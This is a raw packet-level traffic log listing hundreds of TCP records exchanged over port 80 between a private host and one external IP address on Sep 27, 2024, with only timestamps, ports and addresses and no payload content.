Sep 27, 2024 04:14:14.861762047 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861814022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861824989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861835957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861846924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861855030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861896992 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861916065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861924887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861969948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.862870932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.862881899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.862894058 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.862915039 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.862941980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.862998009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863009930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863020897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863033056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863053083 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.863075018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.863167048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863177061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.863240957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921638012 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921679020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921700001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921732903 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921758890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921772957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921787024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921789885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921802998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921816111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921817064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921857119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921857119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.921904087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921919107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921932936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.921955109 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922012091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922029018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922040939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922049999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922051907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922051907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922132015 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922137022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922146082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922158003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922190905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922219038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922245026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922254086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922264099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922276020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922302008 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922336102 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922393084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922419071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922429085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922437906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922449112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922458887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922470093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922480106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922481060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922492981 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922502041 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922528028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922528028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.922593117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.922676086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923005104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923017025 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923027992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923037052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923060894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923070908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923079014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923079014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923080921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923109055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923111916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923122883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923140049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923142910 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923150063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923161030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923187971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923197985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923199892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923199892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923209906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923221111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923232079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923242092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923244953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923283100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923283100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923291922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923302889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923312902 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923324108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923335075 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923345089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923357010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923357010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923408031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923548937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923561096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923571110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923619032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923619032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923690081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923708916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923719883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923732042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923742056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923752069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923762083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923768997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923769951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923774004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923784018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923794985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923799992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923805952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.923820972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923835039 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.923849106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924243927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924254894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924264908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924274921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924285889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924294949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924304962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924307108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924307108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924315929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924326897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924336910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924348116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924355984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924355984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924390078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924390078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924551010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924562931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.924608946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.924608946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953408957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953444004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953460932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953506947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953510046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953510046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953522921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953540087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953557968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953593969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953609943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953627110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953629017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953629017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953676939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953676939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953707933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953722954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953738928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953757048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953757048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953795910 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953840017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953860044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953881979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953900099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953908920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953908920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953918934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953939915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953944921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953944921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953962088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.953964949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.953979015 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.954005003 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.954030037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.954056978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.954083920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.954106092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.954123020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.954128027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.954155922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.954173088 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955188036 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955249071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955269098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955329895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955354929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955354929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955375910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955401897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955413103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955425024 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955435038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955456018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955460072 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955496073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955496073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955539942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955559969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955583096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955590010 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955626011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955626011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955643892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955663919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955684900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.955701113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955701113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.955764055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014111042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014146090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014162064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014240026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014292955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014297009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014326096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014353991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014353991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014358997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014393091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014408112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014416933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014440060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014462948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014472961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014499903 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014503956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014539957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014539957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014554977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014605045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014619112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014638901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014679909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014679909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014686108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014719009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014746904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014787912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014802933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014802933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014802933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014834881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014867067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014875889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014875889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014899015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014945030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.014945984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014945984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.014982939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015012980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015017986 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015044928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015058994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015058994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015079021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015110016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015125990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015125990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015141010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015153885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015172958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015204906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015217066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015217066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015235901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015268087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015280008 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015280008 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015299082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015320063 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015331984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015360117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015362978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015405893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015405893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015429020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015460968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015495062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015503883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015503883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015527964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015559912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015574932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015574932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015593052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015609026 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015642881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015675068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015686989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015711069 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015711069 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015711069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015762091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015786886 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015793085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015824080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015840054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015840054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015856028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015872955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015883923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015914917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015928984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015928984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015945911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.015969038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.015978098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016009092 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016010046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016021967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016040087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016072989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016073942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016118050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.016120911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.016144991 CEST	49704	80	192.168.2.5	185.215.113.37
